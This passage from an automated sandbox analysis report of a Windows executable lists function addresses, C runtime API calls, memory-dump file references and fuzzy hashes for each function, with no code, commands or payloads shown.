                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_unlock$Cnd_broadcast
                        • String ID:
                        • API String ID: 32384418-0
                        • Opcode ID: 5843ebc370e9963bce27722b2e0524d880de5a39a0090370f5d68ebdfd68545d
                        • Instruction ID: cc793d8039f125207f5bf6ac73b5052cd96424e980a76b374f1a082c1f51b100
                        • Opcode Fuzzy Hash: 5843ebc370e9963bce27722b2e0524d880de5a39a0090370f5d68ebdfd68545d
                        • Instruction Fuzzy Hash: 7CA1D1B1A413169FDB21EF68C844BDAB7AABF16324F00412DE815D7342EB30EE45CB91
                        Function 006A2670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON
                        Download Yara Rule
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A2806
                        • ___std_exception_destroy.LIBVCRUNTIME ref: 006A28A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy___std_exception_destroy
                        • String ID: P#j$P#j
                        • API String ID: 2970364248-3156330307
                        • Opcode ID: cda426864b54f6b4d1bb9ffbbddc21180e75feaf6efe62b09c856008b0c84dc9
                        • Instruction ID: 4d2f1bfa4bdbefcf8e3c8a1830a7832fd1467bf9991ca2c767305631e33f69f2
                        • Opcode Fuzzy Hash: cda426864b54f6b4d1bb9ffbbddc21180e75feaf6efe62b09c856008b0c84dc9
                        • Instruction Fuzzy Hash: 30719271E002099FDB04DFA8C891BEDFBB6EF59310F14416DE805A7346EB74A984CBA5
                        Function 006A2AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                        Download Yara Rule
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A2B23
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: P#j$P#j$This function cannot be called on a default constructed task
                        • API String ID: 2659868963-1761824029
                        • Opcode ID: 015fa2a393d87cbf59cef0c2b61b8c87c28eac894bcf4900d32d1d085da6b7c9
                        • Instruction ID: 3b27e8ce837e21830050296d242d79db5b0abf5562c9dc61e465b27c1c35288d
                        • Opcode Fuzzy Hash: 015fa2a393d87cbf59cef0c2b61b8c87c28eac894bcf4900d32d1d085da6b7c9
                        • Instruction Fuzzy Hash: AEF09C71A1030C9BC710DF6C98419EEBBEE9F15300F50419DF90457701EB71AA548B99
                        Function 006A2440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON
                        Download Yara Rule
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A247E
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: 'kkd+p$P#j$P#j
                        • API String ID: 2659868963-847949053
                        • Opcode ID: 58f6f86bdce5c36f0a58a5e0a8cecc11fbc3a4224ee50c3f2262d5815ead4f19
                        • Instruction ID: 6c62f6ad593cdfab6a841bb9b39f554b931e387d332d210aedb43ea6d5a92f77
                        • Opcode Fuzzy Hash: 58f6f86bdce5c36f0a58a5e0a8cecc11fbc3a4224ee50c3f2262d5815ead4f19
                        • Instruction Fuzzy Hash: 2DF0A0B1D1020D67C714EFE8D801989B7ADDA16310B008A2AF744E7601F7B0FA448B9A
                        Function 006DC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction ID: fc7553eb00f5effcc3d96cf9f8904be3e75ab629dae9a1cb9ee03d2aeb974f91
                        • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                        • Instruction Fuzzy Hash: 3DB10532D1028A9FDB11CF68C881BEEBBA7EF55360F1481ABE5599B341D6349D42CB60
                        Function 006BBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xtime_diff_to_millis2_xtime_get
                        • String ID:
                        • API String ID: 531285432-0
                        • Opcode ID: 368be0cbb52661d506d1026df0053bcb9163612128ec834276cb347414ed7456
                        • Instruction ID: 029f717703a7f2dd00d3e968ee31b7469187da54e4748192b7e28704d98a8659
                        • Opcode Fuzzy Hash: 368be0cbb52661d506d1026df0053bcb9163612128ec834276cb347414ed7456
                        • Instruction Fuzzy Hash: F22153B1A001099FDF10EFA4CC819FEBB7AEF48720F004069F601A7261DB70AE418BA5
                        Function 006B7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                        Download Yara Rule
                        APIs
                        • __Mtx_init_in_situ.LIBCPMT ref: 006B726C
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_init_in_situ
                        • String ID: @.j$`zk
                        • API String ID: 3366076730-1601469256
                        • Opcode ID: 65196ed00f59b10e89c9991b005f289436453a5f21bbf12988589f0f8e763608
                        • Instruction ID: 8fc2c1afde4d3b0e48e3386d3c46117d5236698a75af3e98de47d849aa3c1896
                        • Opcode Fuzzy Hash: 65196ed00f59b10e89c9991b005f289436453a5f21bbf12988589f0f8e763608
                        • Instruction Fuzzy Hash: F7A137B0E016198FDB21CFA8C88479EBBF2BF49710F188159E919AB351EB759D41CF90
                        Function 006DF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___free_lconv_mon
                        • String ID: 8"p$`'p
                        • API String ID: 3903695350-1477525673
                        • Opcode ID: de205fa9be4a0f97bd6701cea94ba7e8dcc399755ff42df4851b49c240e67f39
                        • Instruction ID: f42aeac261b2adb0f40b8b0fa4639b7fc160415c266e93a2006de4a387c1bbc5
                        • Opcode Fuzzy Hash: de205fa9be4a0f97bd6701cea94ba7e8dcc399755ff42df4851b49c240e67f39
                        • Instruction Fuzzy Hash: 92319E31E04204AFDB60ABB9D905B9A73EAAF10320F15452FE44BDB391DF32ED808B55
                        Function 006A3930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • __Mtx_init_in_situ.LIBCPMT ref: 006A3962
                        • __Mtx_init_in_situ.LIBCPMT ref: 006A39A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_init_in_situ
                        • String ID: pBj
                        • API String ID: 3366076730-3298301059
                        • Opcode ID: 08f140c99986e50706f2301f832714d55e0ffc8f0e92e22c14f230c76b95b8e4
                        • Instruction ID: 0c217d5614bfb7aa1c7fc9afd2be386fda774c512cdc36ac35fb1c35b4d99896
                        • Opcode Fuzzy Hash: 08f140c99986e50706f2301f832714d55e0ffc8f0e92e22c14f230c76b95b8e4
                        • Instruction Fuzzy Hash: 864124B0501B058FD720DF19C588B9ABBF2FF44315F10861DE9AA8B341EBB4AA15CF80
                        Function 006A2520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • ___std_exception_copy.LIBVCRUNTIME ref: 006A2552
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.3247456508.00000000006A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006A0000, based on PE: true
                        • Associated: 00000007.00000002.3247422440.00000000006A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247456508.0000000000702000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247545725.0000000000709000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000070B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000088D000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000096F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.000000000099A000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247568585.00000000009B1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3247887174.00000000009B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248006942.0000000000B49000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000007.00000002.3248023218.0000000000B4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6a0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___std_exception_copy
                        • String ID: P#j$P#j
                        • API String ID: 2659868963-3156330307
                        • Opcode ID: e5eed19795a72e4bb8155792379a0df662cfe376ca83732e49e382773207bcf7
                        • Instruction ID: e17cb520a75467852008f29943b3fb8349ff4810e6d528f61d3543551a943860
                        • Opcode Fuzzy Hash: e5eed19795a72e4bb8155792379a0df662cfe376ca83732e49e382773207bcf7
                        • Instruction Fuzzy Hash: 1FF082B1E1020DDBC714DF68D84199EBBF9AF55300F1082AEE444A7301EA705A55CB99